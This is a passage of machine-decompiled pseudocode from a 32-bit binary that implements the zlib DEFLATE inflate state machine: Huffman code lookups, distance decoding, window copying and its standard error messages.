                                                                                                                                                                                        										_t1053 = _t817 >> 0x00000008 & 0x000000ff;
                                                                                                                                                                                        										_t1103 = _t1103 - _t1053;
                                                                                                                                                                                        										 *(_t1164 - 0xc) =  *(_t1164 - 0xc) >> _t1053;
                                                                                                                                                                                        										 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        										 *(_t920 + 0x70 +  *(_t1164 - 0x2c) * 2) = _t1075;
                                                                                                                                                                                        										_t920[0x1a] = _t920[0x1a] + 1;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L225:
                                                                                                                                                                                        									goto L228;
                                                                                                                                                                                        								case 0x13:
                                                                                                                                                                                        									L237:
                                                                                                                                                                                        									 *_t920 = 0x14;
                                                                                                                                                                                        									goto L238;
                                                                                                                                                                                        								case 0x14:
                                                                                                                                                                                        									L238:
                                                                                                                                                                                        									__eflags = _t935 - 6;
                                                                                                                                                                                        									if(_t935 < 6) {
                                                                                                                                                                                        										L242:
                                                                                                                                                                                        										_t920[0x6f1] = _t920[0x6f1] & 0x00000000;
                                                                                                                                                                                        										 *(_t1164 - 0x30) = _t920[0x13];
                                                                                                                                                                                        										_t842 =  *(_t920[0x13] + ((1 << _t920[0x15]) - 0x00000001 & _t1081) * 4);
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L245:
                                                                                                                                                                                        											__eflags = (_t842 >> 0x00000008 & 0x000000ff) - _t1103;
                                                                                                                                                                                        											if((_t842 >> 0x00000008 & 0x000000ff) <= _t1103) {
                                                                                                                                                                                        												break;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L243:
                                                                                                                                                                                        											_t935 =  *(_t1164 - 4);
                                                                                                                                                                                        											__eflags = _t935;
                                                                                                                                                                                        											if(_t935 == 0) {
                                                                                                                                                                                        												goto L323;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L244:
                                                                                                                                                                                        											 *(_t1164 - 4) = _t935 - 1;
                                                                                                                                                                                        											_t971 = _t1103;
                                                                                                                                                                                        											_t1103 = _t1103 + 8;
                                                                                                                                                                                        											 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        											 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                                                        											 *(_t1164 - 0xc) = _t1081 + (( *( *(_t1164 - 8)) & 0x000000ff) << _t971);
                                                                                                                                                                                        											__eflags = 1;
                                                                                                                                                                                        											_t842 =  *(_t920[0x13] + ((1 << _t920[0x15]) - 0x00000001 &  *(_t1164 - 0xc)) * 4);
                                                                                                                                                                                        											_t1081 =  *(_t1164 - 0xc);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L246:
                                                                                                                                                                                        										__eflags = _t842;
                                                                                                                                                                                        										if(_t842 == 0) {
                                                                                                                                                                                        											L252:
                                                                                                                                                                                        											_t975 = _t842 >> 0x00000008 & 0x000000ff;
                                                                                                                                                                                        											_t920[0x6f1] = _t920[0x6f1] + _t975;
                                                                                                                                                                                        											_t1103 = _t1103 - _t975;
                                                                                                                                                                                        											_t1054 = _t1081 >> _t975;
                                                                                                                                                                                        											 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                                                        											 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        											_t920[0x10] = _t842 >> 0x10;
                                                                                                                                                                                        											__eflags = _t842;
                                                                                                                                                                                        											if(_t842 != 0) {
                                                                                                                                                                                        												L254:
                                                                                                                                                                                        												__eflags = _t842 & 0x00000020;
                                                                                                                                                                                        												if((_t842 & 0x00000020) == 0) {
                                                                                                                                                                                        													L256:
                                                                                                                                                                                        													_t928 =  *(_t1164 - 4);
                                                                                                                                                                                        													__eflags = _t842 & 0x00000040;
                                                                                                                                                                                        													if((_t842 & 0x00000040) == 0) {
                                                                                                                                                                                        														L258:
                                                                                                                                                                                        														_t848 = _t842 & 0xf;
                                                                                                                                                                                        														__eflags = _t848;
                                                                                                                                                                                        														 *_t920 = 0x15;
                                                                                                                                                                                        														_t920[0x12] = _t848;
                                                                                                                                                                                        														goto L259;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L257:
                                                                                                                                                                                        													_t1125[6] = "invalid literal/length code";
                                                                                                                                                                                        													goto L31;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L255:
                                                                                                                                                                                        												_t920[0x6f1] = _t920[0x6f1] | 0xffffffff;
                                                                                                                                                                                        												 *_t920 = 0xb;
                                                                                                                                                                                        												goto L134;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L253:
                                                                                                                                                                                        											 *_t920 = 0x19;
                                                                                                                                                                                        											goto L134;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L247:
                                                                                                                                                                                        										__eflags = _t842 & 0x000000f0;
                                                                                                                                                                                        										if((_t842 & 0x000000f0) != 0) {
                                                                                                                                                                                        											goto L252;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L248:
                                                                                                                                                                                        										_t926 = _t842 >> 8;
                                                                                                                                                                                        										_t1096 = _t842;
                                                                                                                                                                                        										 *(_t1164 - 0x34) = _t1096;
                                                                                                                                                                                        										_t842 =  *( *(_t1164 - 0x30) + ((((1 << (_t842 & 0x000000ff) + (_t926 & 0x000000ff)) - 0x00000001 &  *(_t1164 - 0xc)) >> (_t926 & 0x000000ff)) + (_t842 >> 0x10)) * 4);
                                                                                                                                                                                        										_t1103 =  *(_t1164 - 0x10);
                                                                                                                                                                                        										_t920 =  *(_t1164 - 0x24);
                                                                                                                                                                                        										__eflags = (_t842 >> 0x00000008 & 0x000000ff) + (_t926 & 0x000000ff) - _t1103;
                                                                                                                                                                                        										if((_t842 >> 0x00000008 & 0x000000ff) + (_t926 & 0x000000ff) <= _t1103) {
                                                                                                                                                                                        											L251:
                                                                                                                                                                                        											_t1125 =  *(_t1164 + 8);
                                                                                                                                                                                        											_t1025 = _t1096 & 0x000000ff;
                                                                                                                                                                                        											_t1081 =  *(_t1164 - 0xc) >> _t1025;
                                                                                                                                                                                        											_t1103 = _t1103 - _t1025;
                                                                                                                                                                                        											__eflags = _t1103;
                                                                                                                                                                                        											_t920[0x6f1] = _t1025;
                                                                                                                                                                                        											goto L252;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											goto L249;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L249:
                                                                                                                                                                                        											_t1153 =  *(_t1164 - 4);
                                                                                                                                                                                        											__eflags = _t1153;
                                                                                                                                                                                        											if(_t1153 == 0) {
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L250:
                                                                                                                                                                                        											 *(_t1164 - 4) = _t1153 - 1;
                                                                                                                                                                                        											_t1155 =  *(_t1164 - 8);
                                                                                                                                                                                        											 *(_t1164 - 0x10) = _t1103 + 8;
                                                                                                                                                                                        											_t1124 = _t1096 & 0x000000ff;
                                                                                                                                                                                        											 *(_t1164 - 0xc) =  *(_t1164 - 0xc) + (( *_t1155 & 0x000000ff) << _t1103);
                                                                                                                                                                                        											 *(_t1164 - 8) =  &(_t1155[1]);
                                                                                                                                                                                        											_t842 =  *(_t920[0x13] + ((((1 << (_t1096 & 0x000000ff) + _t1124) - 0x00000001 &  *(_t1164 - 0xc)) >> _t1124) + ( *(_t1164 - 0x32) & 0x0000ffff)) * 4);
                                                                                                                                                                                        											_t1103 =  *(_t1164 - 0x10);
                                                                                                                                                                                        											__eflags = (_t842 >> 0x00000008 & 0x000000ff) + _t1124 - _t1103;
                                                                                                                                                                                        											if((_t842 >> 0x00000008 & 0x000000ff) + _t1124 > _t1103) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L251;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L239:
                                                                                                                                                                                        									_t901 =  *(_t1164 - 0x18);
                                                                                                                                                                                        									__eflags = _t901 - 0x102;
                                                                                                                                                                                        									if(_t901 < 0x102) {
                                                                                                                                                                                        										goto L242;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L240:
                                                                                                                                                                                        									_push( *((intOrPtr*)(_t1164 - 0x28)));
                                                                                                                                                                                        									_t1125[3] =  *(_t1164 - 0x1c);
                                                                                                                                                                                        									_t920 =  *(_t1164 - 0x24);
                                                                                                                                                                                        									_t1125[4] = _t901;
                                                                                                                                                                                        									 *_t1125 =  *(_t1164 - 8);
                                                                                                                                                                                        									_t1125[1] = _t935;
                                                                                                                                                                                        									_push(_t1125);
                                                                                                                                                                                        									_t920[0xe] = _t1081;
                                                                                                                                                                                        									_t920[0xf] = _t1103;
                                                                                                                                                                                        									E01323840();
                                                                                                                                                                                        									__eflags =  *_t920 - 0xb;
                                                                                                                                                                                        									_t1054 = _t920[0xe];
                                                                                                                                                                                        									_t1103 = _t920[0xf];
                                                                                                                                                                                        									 *(_t1164 - 0x1c) = _t1125[3];
                                                                                                                                                                                        									_t928 = _t1125[1];
                                                                                                                                                                                        									 *(_t1164 - 0x18) = _t1125[4];
                                                                                                                                                                                        									 *(_t1164 - 8) =  *_t1125;
                                                                                                                                                                                        									 *(_t1164 - 4) = _t928;
                                                                                                                                                                                        									 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                                                        									 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        									if( *_t920 == 0xb) {
                                                                                                                                                                                        										_t920[0x6f1] = _t920[0x6f1] | 0xffffffff;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L135;
                                                                                                                                                                                        								case 0x15:
                                                                                                                                                                                        									L259:
                                                                                                                                                                                        									_t1129 = _t920[0x12];
                                                                                                                                                                                        									__eflags = _t1129;
                                                                                                                                                                                        									if(_t1129 == 0) {
                                                                                                                                                                                        										L265:
                                                                                                                                                                                        										_t920[0x6f2] = _t920[0x10];
                                                                                                                                                                                        										 *_t920 = 0x16;
                                                                                                                                                                                        										goto L266;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L260:
                                                                                                                                                                                        									__eflags = _t1103 - _t1129;
                                                                                                                                                                                        									if(_t1103 >= _t1129) {
                                                                                                                                                                                        										L264:
                                                                                                                                                                                        										_t1015 = _t1129;
                                                                                                                                                                                        										_t1103 = _t1103 - _t1129;
                                                                                                                                                                                        										 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        										_t891 = (1 << _t1015) - 0x00000001 & _t1054;
                                                                                                                                                                                        										_t1054 = _t1054 >> _t1015;
                                                                                                                                                                                        										_t920[0x10] = _t920[0x10] + _t891;
                                                                                                                                                                                        										_t580 =  &(_t920[0x6f1]);
                                                                                                                                                                                        										 *_t580 = _t920[0x6f1] + _t1129;
                                                                                                                                                                                        										__eflags =  *_t580;
                                                                                                                                                                                        										 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                                                        										goto L265;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L261:
                                                                                                                                                                                        									_t892 =  *(_t1164 - 8);
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L262:
                                                                                                                                                                                        										__eflags = _t928;
                                                                                                                                                                                        										if(_t928 == 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L263:
                                                                                                                                                                                        										 *(_t1164 - 4) = _t928 - 1;
                                                                                                                                                                                        										_t894 = ( *_t892 & 0x000000ff) << _t1103;
                                                                                                                                                                                        										_t1103 = _t1103 + 8;
                                                                                                                                                                                        										_t928 =  *(_t1164 - 4);
                                                                                                                                                                                        										_t1054 = _t1054 + _t894;
                                                                                                                                                                                        										_t892 =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                                                        										 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                                                        										 *(_t1164 - 8) = _t892;
                                                                                                                                                                                        										__eflags = _t1103 - _t1129;
                                                                                                                                                                                        										if(_t1103 < _t1129) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L264;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L322;
                                                                                                                                                                                        								case 0x16:
                                                                                                                                                                                        									L266:
                                                                                                                                                                                        									_t1130 = _t920[0x14];
                                                                                                                                                                                        									 *(_t1164 - 0x30) = _t1130;
                                                                                                                                                                                        									_t855 =  *(_t1130 + ((1 << _t920[0x16]) - 0x00000001 & _t1054) * 4);
                                                                                                                                                                                        									__eflags = 0xad - _t1103;
                                                                                                                                                                                        									if(0xad <= _t1103) {
                                                                                                                                                                                        										L270:
                                                                                                                                                                                        										__eflags = _t855 & 0x000000f0;
                                                                                                                                                                                        										if((_t855 & 0x000000f0) != 0) {
                                                                                                                                                                                        											L275:
                                                                                                                                                                                        											_t1125 =  *(_t1164 + 8);
                                                                                                                                                                                        											_t984 = _t855 >> 0x00000008 & 0x000000ff;
                                                                                                                                                                                        											_t920[0x6f1] = _t920[0x6f1] + _t984;
                                                                                                                                                                                        											_t1103 = _t1103 - _t984;
                                                                                                                                                                                        											_t1054 = _t1054 >> _t984;
                                                                                                                                                                                        											 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                                                        											 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        											__eflags = _t855 & 0x00000040;
                                                                                                                                                                                        											if((_t855 & 0x00000040) == 0) {
                                                                                                                                                                                        												L277:
                                                                                                                                                                                        												 *_t920 = 0x17;
                                                                                                                                                                                        												_t857 = _t855 & 0xf;
                                                                                                                                                                                        												__eflags = _t857;
                                                                                                                                                                                        												_t920[0x11] = _t855 >> 0x10;
                                                                                                                                                                                        												_t920[0x12] = _t857;
                                                                                                                                                                                        												goto L278;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L276:
                                                                                                                                                                                        											_t1125[6] = "invalid distance code";
                                                                                                                                                                                        											goto L17;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L271:
                                                                                                                                                                                        										_t924 = _t855 >> 8;
                                                                                                                                                                                        										_t1088 = _t855;
                                                                                                                                                                                        										 *(_t1164 - 0x34) = _t1088;
                                                                                                                                                                                        										_t855 =  *( *(_t1164 - 0x30) + ((((1 << (_t855 & 0x000000ff) + (_t924 & 0x000000ff)) - 0x00000001 &  *(_t1164 - 0xc)) >> (_t924 & 0x000000ff)) + (_t855 >> 0x10)) * 4);
                                                                                                                                                                                        										_t1103 =  *(_t1164 - 0x10);
                                                                                                                                                                                        										_t920 =  *(_t1164 - 0x24);
                                                                                                                                                                                        										__eflags = (_t855 >> 0x00000008 & 0x000000ff) + (_t924 & 0x000000ff) - _t1103;
                                                                                                                                                                                        										if((_t855 >> 0x00000008 & 0x000000ff) + (_t924 & 0x000000ff) <= _t1103) {
                                                                                                                                                                                        											L274:
                                                                                                                                                                                        											_t1001 = _t1088 & 0x000000ff;
                                                                                                                                                                                        											_t1103 = _t1103 - _t1001;
                                                                                                                                                                                        											_t1054 =  *(_t1164 - 0xc) >> _t1001;
                                                                                                                                                                                        											_t626 =  &(_t920[0x6f1]);
                                                                                                                                                                                        											 *_t626 = _t920[0x6f1] + _t1001;
                                                                                                                                                                                        											__eflags =  *_t626;
                                                                                                                                                                                        											goto L275;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											goto L272;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L272:
                                                                                                                                                                                        											_t1138 =  *(_t1164 - 4);
                                                                                                                                                                                        											__eflags = _t1138;
                                                                                                                                                                                        											if(_t1138 == 0) {
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L273:
                                                                                                                                                                                        											 *(_t1164 - 4) = _t1138 - 1;
                                                                                                                                                                                        											_t1140 =  *(_t1164 - 8);
                                                                                                                                                                                        											 *(_t1164 - 0x10) = _t1103 + 8;
                                                                                                                                                                                        											_t1115 = _t1088 & 0x000000ff;
                                                                                                                                                                                        											 *(_t1164 - 0xc) =  *(_t1164 - 0xc) + (( *_t1140 & 0x000000ff) << _t1103);
                                                                                                                                                                                        											 *(_t1164 - 8) =  &(_t1140[1]);
                                                                                                                                                                                        											_t855 =  *(_t920[0x14] + ((((1 << (_t1088 & 0x000000ff) + _t1115) - 0x00000001 &  *(_t1164 - 0xc)) >> _t1115) + ( *(_t1164 - 0x32) & 0x0000ffff)) * 4);
                                                                                                                                                                                        											_t1103 =  *(_t1164 - 0x10);
                                                                                                                                                                                        											__eflags = (_t855 >> 0x00000008 & 0x000000ff) + _t1115 - _t1103;
                                                                                                                                                                                        											if((_t855 >> 0x00000008 & 0x000000ff) + _t1115 > _t1103) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L274;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L267:
                                                                                                                                                                                        									_t1149 =  *(_t1164 - 4);
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L268:
                                                                                                                                                                                        										__eflags = _t1149;
                                                                                                                                                                                        										if(_t1149 == 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L269:
                                                                                                                                                                                        										_t1010 = _t1103;
                                                                                                                                                                                        										_t1149 = _t1149 - 1;
                                                                                                                                                                                        										_t1103 = _t1103 + 8;
                                                                                                                                                                                        										 *(_t1164 - 4) = _t1149;
                                                                                                                                                                                        										 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        										 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                                                        										 *(_t1164 - 0xc) = _t1054 + (( *( *(_t1164 - 8)) & 0x000000ff) << _t1010);
                                                                                                                                                                                        										_t855 =  *(_t920[0x14] + ((1 << _t920[0x16]) - 0x00000001 &  *(_t1164 - 0xc)) * 4);
                                                                                                                                                                                        										_t1054 =  *(_t1164 - 0xc);
                                                                                                                                                                                        										__eflags = (_t855 >> 0x00000008 & 0x000000ff) - _t1103;
                                                                                                                                                                                        										if((_t855 >> 0x00000008 & 0x000000ff) > _t1103) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L270;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L322;
                                                                                                                                                                                        								case 0x17:
                                                                                                                                                                                        									L278:
                                                                                                                                                                                        									_t987 = _t920[0x12];
                                                                                                                                                                                        									__eflags = _t987;
                                                                                                                                                                                        									if(_t987 == 0) {
                                                                                                                                                                                        										L284:
                                                                                                                                                                                        										 *_t920 = 0x18;
                                                                                                                                                                                        										goto L285;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L279:
                                                                                                                                                                                        									__eflags = _t1103 - _t987;
                                                                                                                                                                                        									if(_t1103 >= _t987) {
                                                                                                                                                                                        										L283:
                                                                                                                                                                                        										_t1103 = _t1103 - _t987;
                                                                                                                                                                                        										 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        										_t873 = (1 << _t987) - 0x00000001 & _t1054;
                                                                                                                                                                                        										_t1054 = _t1054 >> _t987;
                                                                                                                                                                                        										_t920[0x11] = _t920[0x11] + _t873;
                                                                                                                                                                                        										_t649 =  &(_t920[0x6f1]);
                                                                                                                                                                                        										 *_t649 = _t920[0x6f1] + _t987;
                                                                                                                                                                                        										__eflags =  *_t649;
                                                                                                                                                                                        										 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                                                        										goto L284;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L280:
                                                                                                                                                                                        									_t874 =  *(_t1164 - 8);
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L281:
                                                                                                                                                                                        										_t935 =  *(_t1164 - 4);
                                                                                                                                                                                        										__eflags = _t935;
                                                                                                                                                                                        										if(_t935 == 0) {
                                                                                                                                                                                        											goto L323;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L282:
                                                                                                                                                                                        										 *(_t1164 - 4) = _t935 - 1;
                                                                                                                                                                                        										_t876 = ( *_t874 & 0x000000ff) << _t1103;
                                                                                                                                                                                        										_t1103 = _t1103 + 8;
                                                                                                                                                                                        										_t987 = _t920[0x12];
                                                                                                                                                                                        										_t1054 = _t1054 + _t876;
                                                                                                                                                                                        										_t874 =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                                                        										 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                                                        										 *(_t1164 - 8) = _t874;
                                                                                                                                                                                        										__eflags = _t1103 - _t987;
                                                                                                                                                                                        										if(_t1103 < _t987) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L283;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L323;
                                                                                                                                                                                        								case 0x18:
                                                                                                                                                                                        									L285:
                                                                                                                                                                                        									_t988 =  *(_t1164 - 0x18);
                                                                                                                                                                                        									__eflags = _t988;
                                                                                                                                                                                        									if(_t988 == 0) {
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L286:
                                                                                                                                                                                        									_t859 =  *((intOrPtr*)(_t1164 - 0x28)) - _t988;
                                                                                                                                                                                        									_t989 = _t920[0x11];
                                                                                                                                                                                        									__eflags = _t989 - _t859;
                                                                                                                                                                                        									if(_t989 <= _t859) {
                                                                                                                                                                                        										L295:
                                                                                                                                                                                        										_t861 =  *(_t1164 - 0x1c) - _t989;
                                                                                                                                                                                        										__eflags = _t861;
                                                                                                                                                                                        										 *(_t1164 - 0x34) = _t861;
                                                                                                                                                                                        										_t862 = _t920[0x10];
                                                                                                                                                                                        										L296:
                                                                                                                                                                                        										_t990 = _t862;
                                                                                                                                                                                        										L297:
                                                                                                                                                                                        										_t1131 =  *(_t1164 - 0x18);
                                                                                                                                                                                        										__eflags = _t990 - _t1131;
                                                                                                                                                                                        										_t991 = (_t990 > _t1131) ? _t1131 : _t990;
                                                                                                                                                                                        										 *(_t1164 - 0x18) = _t1131 - _t991;
                                                                                                                                                                                        										_t920[0x10] = _t862 - _t991;
                                                                                                                                                                                        										_t922 =  *(_t1164 - 0x1c);
                                                                                                                                                                                        										_t1134 =  *(_t1164 - 0x34) - _t922;
                                                                                                                                                                                        										__eflags = _t1134;
                                                                                                                                                                                        										do {
                                                                                                                                                                                        											L298:
                                                                                                                                                                                        											 *_t922 = _t922[_t1134];
                                                                                                                                                                                        											_t922 =  &(_t922[1]);
                                                                                                                                                                                        											_t991 = _t991 - 1;
                                                                                                                                                                                        											__eflags = _t991;
                                                                                                                                                                                        										} while (_t991 != 0);
                                                                                                                                                                                        										_t1125 =  *(_t1164 + 8);
                                                                                                                                                                                        										 *(_t1164 - 0x1c) = _t922;
                                                                                                                                                                                        										_t920 =  *(_t1164 - 0x24);
                                                                                                                                                                                        										__eflags = _t920[0x10] - _t991;
                                                                                                                                                                                        										if(_t920[0x10] == _t991) {
                                                                                                                                                                                        											 *_t920 = 0x14;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L134;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L287:
                                                                                                                                                                                        									_t990 = _t989 - _t859;
                                                                                                                                                                                        									__eflags = _t990 - _t920[0xb];
                                                                                                                                                                                        									if(_t990 <= _t920[0xb]) {
                                                                                                                                                                                        										L290:
                                                                                                                                                                                        										_t865 = _t920[0xd];
                                                                                                                                                                                        										__eflags = _t990 - _t920[0xc];
                                                                                                                                                                                        										if(_t990 <= _t920[0xc]) {
                                                                                                                                                                                        											_t867 = _t865 - _t990 + _t920[0xc];
                                                                                                                                                                                        											__eflags = _t867;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											_t990 = _t990 - _t920[0xc];
                                                                                                                                                                                        											_t867 = _t865 + _t920[0xa] - _t990;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										 *(_t1164 - 0x34) = _t867;
                                                                                                                                                                                        										_t862 = _t920[0x10];
                                                                                                                                                                                        										__eflags = _t990 - _t862;
                                                                                                                                                                                        										if(_t990 <= _t862) {
                                                                                                                                                                                        											goto L297;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											L294:
                                                                                                                                                                                        											goto L296;
                                                                                                                                                                                        										}
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L288:
                                                                                                                                                                                        									__eflags = _t920[0x6f0];
                                                                                                                                                                                        									if(_t920[0x6f0] == 0) {
                                                                                                                                                                                        										goto L290;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L289:
                                                                                                                                                                                        									_t1125[6] = "invalid distance too far back";
                                                                                                                                                                                        									goto L17;
                                                                                                                                                                                        								case 0x19:
                                                                                                                                                                                        									L301:
                                                                                                                                                                                        									__eflags =  *(__ebp - 0x18);
                                                                                                                                                                                        									if( *(__ebp - 0x18) == 0) {
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L302:
                                                                                                                                                                                        									__esi =  *(__ebp - 0x1c);
                                                                                                                                                                                        									__al = __ebx[0x10];
                                                                                                                                                                                        									 *(__ebp - 0x1c) =  *(__ebp - 0x1c) + 1;
                                                                                                                                                                                        									 *(__ebp - 0x18) =  *(__ebp - 0x18) - 1;
                                                                                                                                                                                        									 *( *(__ebp - 0x1c)) = __al;
                                                                                                                                                                                        									__esi =  *(__ebp + 8);
                                                                                                                                                                                        									 *__ebx = 0x14;
                                                                                                                                                                                        									goto L135;
                                                                                                                                                                                        								case 0x1a:
                                                                                                                                                                                        									L303:
                                                                                                                                                                                        									__eflags = __ebx[2];
                                                                                                                                                                                        									if (__ebx[2] == 0) goto L306;
                                                                                                                                                                                        									__eflags =  *(__ebp - 0x7d000000) & __bh;
                                                                                                                                                                                        								case 0x1b:
                                                                                                                                                                                        									L307:
                                                                                                                                                                                        									__eax = 0;
                                                                                                                                                                                        									__eflags = __ebx[2];
                                                                                                                                                                                        									if(__ebx[2] == 0) {
                                                                                                                                                                                        										L318:
                                                                                                                                                                                        										 *__ebx = 0x1c;
                                                                                                                                                                                        										goto L319;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L308:
                                                                                                                                                                                        									__eflags = __ebx[4];
                                                                                                                                                                                        									if(__ebx[4] == 0) {
                                                                                                                                                                                        										goto L318;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L309:
                                                                                                                                                                                        									__eflags = __edi - 0x20;
                                                                                                                                                                                        									if(__edi >= 0x20) {
                                                                                                                                                                                        										L314:
                                                                                                                                                                                        										__eflags = __edx - __ebx[7];
                                                                                                                                                                                        										if(__edx == __ebx[7]) {
                                                                                                                                                                                        											L317:
                                                                                                                                                                                        											 *(__ebp - 0xc) = __eax;
                                                                                                                                                                                        											__edi = __eax;
                                                                                                                                                                                        											goto L318;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L315:
                                                                                                                                                                                        										 *(__esi + 0x18) = "incorrect length check";
                                                                                                                                                                                        										L17:
                                                                                                                                                                                        										 *_t920 = 0x1d;
                                                                                                                                                                                        										L134:
                                                                                                                                                                                        										_t928 =  *(_t1164 - 4);
                                                                                                                                                                                        										goto L135;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L310:
                                                                                                                                                                                        									__eax =  *(__ebp - 8);
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L311:
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L312:
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__ecx =  *(__ebp - 4);
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										__eax =  *(__ebp - 8);
                                                                                                                                                                                        										__eax =  *(__ebp - 8) + 1;
                                                                                                                                                                                        										 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        										 *(__ebp - 8) = __eax;
                                                                                                                                                                                        										 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        										__eflags = __edi - 0x20;
                                                                                                                                                                                        										if(__edi < 0x20) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L313:
                                                                                                                                                                                        										__eax = 0;
                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                        										goto L314;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L322;
                                                                                                                                                                                        								case 0x1c:
                                                                                                                                                                                        									L319:
                                                                                                                                                                                        									__eax = 0;
                                                                                                                                                                                        									__eax = 1;
                                                                                                                                                                                        									goto L321;
                                                                                                                                                                                        								case 0x1d:
                                                                                                                                                                                        									L320:
                                                                                                                                                                                        									_push(0xfffffffd);
                                                                                                                                                                                        									_pop(__eax);
                                                                                                                                                                                        									L321:
                                                                                                                                                                                        									 *(__ebp - 0x20) = __eax;
                                                                                                                                                                                        									goto L322;
                                                                                                                                                                                        								case 0x1e:
                                                                                                                                                                                        									goto L330;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						L136:
                                                                                                                                                                                        						_push(0xfffffffe);
                                                                                                                                                                                        						goto L137;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L181:
                                                                                                                                                                                        					if(_t920[0x19] > 0x1e) {
                                                                                                                                                                                        						goto L183;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L182:
                                                                                                                                                                                        					_t920[0x1a] = _t920[0x1a] & 0x00000000;
                                                                                                                                                                                        					_t800 = 0x11;
                                                                                                                                                                                        					 *_t920 = _t800;
                                                                                                                                                                                        					goto L189;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}
























